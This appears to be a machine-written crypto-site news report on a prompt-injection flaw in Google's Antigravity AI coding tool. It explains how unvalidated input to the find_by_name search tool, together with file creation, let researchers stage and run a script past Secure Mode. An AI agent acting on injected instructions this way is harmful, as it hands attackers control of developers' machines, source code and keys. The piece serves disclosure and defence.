April 22, 2026 ChainGPT

Google Patches Antigravity Prompt-Injection RCE Bug — Crypto Devs Urged to Audit

Google Patches Antigravity Prompt-Injection RCE Bug — Crypto Devs Urged to Audit
Headline: Google patches Antigravity bug that let attackers run code via prompt injection Google has fixed a vulnerability in its Antigravity AI coding environment that, researchers say, could have allowed attackers to execute commands on a developer’s machine through a prompt injection attack. What happened - The flaw lived in Antigravity’s find_by_name file-search tool. Pillar Security, the cybersecurity firm that reported the issue, found the tool passed user input straight to an underlying command-line utility with no validation. - That unchecked input could turn a simple file search into command execution, enabling remote code execution (RCE). Because Antigravity is allowed to create files, an attacker could stage a malicious script and then trigger it via the search tool — all without extra user interaction once a prompt injection landed. - In a proof-of-concept, Pillar Security researchers created a test script in a project workspace and triggered it through the search function; when executed, the script opened the computer’s calculator app, demonstrating the search-to-execution path. Timeline and response - Antigravity, Google’s AI-powered development environment launched last November, helps programmers write, test and manage code using autonomous agents. - Pillar Security disclosed the vulnerability to Google on January 7. Google acknowledged the report the same day and marked the issue as fixed on February 28. Google did not immediately respond to a request for comment by Decrypt. Why it matters - Prompt injection attacks embed hidden instructions into content so an AI system performs unintended actions. Because developer tools routinely ingest external files and text, malicious inputs can be interpreted as legitimate commands — a critical risk when those tools can perform system-level actions. - The vulnerability also bypassed Antigravity’s Secure Mode, the product’s most restrictive security configuration, the report said. Broader implications for the crypto and dev communities - As AI agents gain more autonomy in development workflows, similar weaknesses could put source code, build environments, private keys and deployment pipelines at risk — a particular concern for crypto projects and wallets that depend on secure development chains. - Pillar Security warned the industry to move beyond naive sanitization. “Every native tool parameter that reaches a shell command is a potential injection point,” the firm wrote, urging execution isolation and rigorous auditing for agentic features. Bottom line - The incident underscores that adding AI autonomy to development tools raises new attack surfaces. Crypto developers and teams using agentic coding environments should audit tool behaviors, limit native shell access where possible, and demand execution isolation from vendors shipping autonomous features. Read more AI-generated news on: undefined/news